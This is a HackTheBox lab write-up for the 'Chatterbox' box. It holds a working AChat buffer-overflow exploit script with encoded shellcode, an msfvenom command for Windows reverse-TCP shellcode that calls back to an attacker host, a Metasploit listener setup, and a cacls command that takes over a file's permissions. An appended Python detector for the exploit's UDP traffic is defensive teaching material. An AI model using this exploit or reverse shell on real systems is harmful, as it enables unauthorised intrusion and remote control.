
Chatterbox – HackTheBox Writeup

So first things first, let's nmap it:

root@Kali:~/Documents/pentests/HTB/Chatterbox# nmap -v -T5 -p 9000-9999 -oA nmap 10.10.10.74

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-14 07:30 EST
Initiating Ping Scan at 07:30
Scanning 10.10.10.74 [4 ports]
Completed Ping Scan at 07:30, 0.45s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:30
Completed Parallel DNS resolution of 1 host. at 07:30, 2.06s elapsed
Initiating SYN Stealth Scan at 07:30
Scanning 10.10.10.74 [1000 ports]
Discovered open port 9255/tcp on 10.10.10.74
Increasing send delay for 10.10.10.74 from 0 to 5 due to 11 out of 21 dropped probes since last increase.
SYN Stealth Scan Timing: About 42.20% done; ETC: 07:31 (0:00:42 remaining)
Discovered open port 9256/tcp on 10.10.10.74
Warning: 10.10.10.74 giving up on port because retransmission cap hit (2).
Completed SYN Stealth Scan at 07:31, 72.89s elapsed (1000 total ports)
Nmap scan report for 10.10.10.74
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
9255/tcp open mon
9256/tcp open unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 75.50 seconds
Raw packets sent: 3039 (133.692KB) | Rcvd: 41 (1.788KB)


After that, let's run a service and script scan against only ports 9255 and 9256:

root@Kali:~/Documents/pentests/HTB/Chatterbox# nmap -p 9255,9256 -sC -sV 10.10.10.74

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-14 07:35 EST
Nmap scan report for 10.10.10.74
Host is up (0.28s latency).

PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.84 seconds

So now we know that AChat is running. The exploit for this is a buffer overflow in the AChat chat system (the script below).

First we generate our own shellcode with msfvenom:

msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python > exploit.py

After that, we use the exploit:

#!/usr/bin/python
# Achat 0.150 beta7 - Buffer Overflow

import socket
import sys, time

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x39\x58\x72\x62"
buf += "\x6d\x30\x39\x70\x39\x70\x63\x30\x35\x39\x57\x75\x4e"
buf += "\x51\x67\x50\x52\x44\x54\x4b\x70\x50\x50\x30\x74\x4b"
buf += "\x6f\x62\x7a\x6c\x52\x6b\x6f\x62\x4b\x64\x74\x4b\x61"
buf += "\x62\x4d\x58\x5a\x6f\x36\x57\x6e\x6a\x6d\x56\x30\x31"
buf += "\x39\x6f\x54\x6c\x6f\x4c\x61\x51\x33\x4c\x4b\x52\x6c"
buf += "\x6c\x4f\x30\x77\x51\x78\x4f\x5a\x6d\x39\x71\x37\x57"
buf += "\x5a\x42\x7a\x52\x4f\x62\x52\x37\x34\x4b\x31\x42\x7a"
buf += "\x70\x52\x6b\x6e\x6a\x6f\x4c\x42\x6b\x4e\x6c\x6c\x51"
buf += "\x50\x78\x77\x73\x6e\x68\x6a\x61\x67\x61\x70\x51\x32"
buf += "\x6b\x6e\x79\x4b\x70\x39\x71\x6a\x33\x64\x4b\x50\x49"
buf += "\x5a\x78\x37\x73\x6e\x5a\x61\x39\x42\x6b\x50\x34\x74"
buf += "\x4b\x49\x71\x78\x56\x4d\x61\x59\x6f\x64\x6c\x69\x31"
buf += "\x76\x6f\x4c\x4d\x49\x71\x56\x67\x30\x38\x59\x50\x50"
buf += "\x75\x49\x66\x49\x73\x31\x6d\x39\x68\x4f\x4b\x73\x4d"
buf += "\x6d\x54\x62\x55\x38\x64\x72\x38\x42\x6b\x31\x48\x6c"
buf += "\x64\x7a\x61\x56\x73\x63\x36\x44\x4b\x4c\x4c\x6e\x6b"
buf += "\x64\x4b\x71\x48\x6b\x6c\x59\x71\x57\x63\x54\x4b\x6a"
buf += "\x64\x52\x6b\x69\x71\x48\x50\x43\x59\x4d\x74\x4b\x74"
buf += "\x4f\x34\x31\x4b\x6f\x6b\x43\x31\x4f\x69\x70\x5a\x72"

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i = 0
while i < len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()

Set up a listener:

msfconsole > use exploit/multi/handler
msfconsole > set payload windows/shell/reverse_tcp
msfconsole > set lhost 10.10.14.16
msfconsole > run

Run exploit.py and you will get the shell in your msfconsole. We can then upgrade from a regular shell to Meterpreter using post/multi/manage/shell_to_meterpreter. After you get the Meterpreter shell, we can see that we are able to go into the Administrator's Desktop and that the root.txt file is there, however we can't view it.

So to view it we run:

cacls root.txt /E /P chatterbox\alfred:F

Here /E edits the existing ACL instead of replacing it, and /P chatterbox\alfred:F grants Alfred full control over the file.

This makes the file fully readable. We can then run: more root.txt to get the flag.

Then go into Alfred's desktop to view the user.txt file.
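As an added example that is not part of the original writeup, here is a small Python heuristic from the defender's side for the traffic pattern this exploit produces: one logical AChat message far larger than any chat line, sent to UDP/9256 as a burst of 8192-byte datagrams that are mostly runs of a single filler byte. The thresholds and the packet records are constructed assumptions for the example, not values from the box.

```python
from collections import defaultdict
from dataclasses import dataclass
ACHAT_PORT = 9256      # AChat UDP port from the nmap scan above
MAX_DATAGRAM = 1024    # assumed ceiling for a legitimate chat datagram
BURST_BYTES = 65536    # assumed bytes-per-source within WINDOW before alerting
WINDOW = 5.0           # seconds
RUN_RATIO = 0.9        # share of one repeated byte that marks overflow filler

@dataclass
class Datagram:
    ts: float       # capture time in seconds
    src: str        # source address
    dport: int      # destination UDP port
    payload: bytes
def longest_run_ratio(data: bytes) -> float:
    """Fraction of the payload occupied by its longest run of one byte value."""
    if not data:
        return 0.0
    best = run = 1
    for prev, cur in zip(data, data[1:]):
        run = run + 1 if cur == prev else 1
        best = max(best, run)
    return best / len(data)

def detect(records):
    """Return alert strings for datagrams matching the AChat overflow shape."""
    alerts = []
    recent = defaultdict(list)          # src -> [(ts, size)] inside WINDOW
    for d in records:
        if d.dport != ACHAT_PORT:
            continue
        win = [(t, n) for t, n in recent[d.src] if d.ts - t <= WINDOW]
        win.append((d.ts, len(d.payload)))
        recent[d.src] = win
        if len(d.payload) > MAX_DATAGRAM:
            alerts.append(f"{d.src}: oversized AChat datagram ({len(d.payload)} bytes)")
        if len(d.payload) > 64 and longest_run_ratio(d.payload) >= RUN_RATIO:
            alerts.append(f"{d.src}: filler-pattern datagram")
        total = sum(n for _, n in win)
        if total > BURST_BYTES:
            alerts.append(f"{d.src}: {total} bytes to udp/{ACHAT_PORT} within {WINDOW:.0f}s")
            recent[d.src] = []          # one alert per burst
    return alerts

# Constructed sample traffic: one ordinary chat line, then 22 datagrams shaped like
# the exploit's 8192-byte sendto() chunks (header on the first, filler after it).
SAMPLE = [Datagram(0.0, "10.0.0.5", ACHAT_PORT, b"A0000000002#Main\x00hello\x00")]
SAMPLE += [Datagram(1.0 + i * 0.01, "10.0.0.9", ACHAT_PORT,
                    ((b"A0000000002#Main\x00" if i == 0 else b"") + b"Z" * 8192)[:8192])
           for i in range(22)]
```

Running detect(SAMPLE) flags every chunk from the bursting source as oversized and filler-like, and raises a burst alert each time that source crosses BURST_BYTES within the window, while the ordinary chat line produces nothing.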
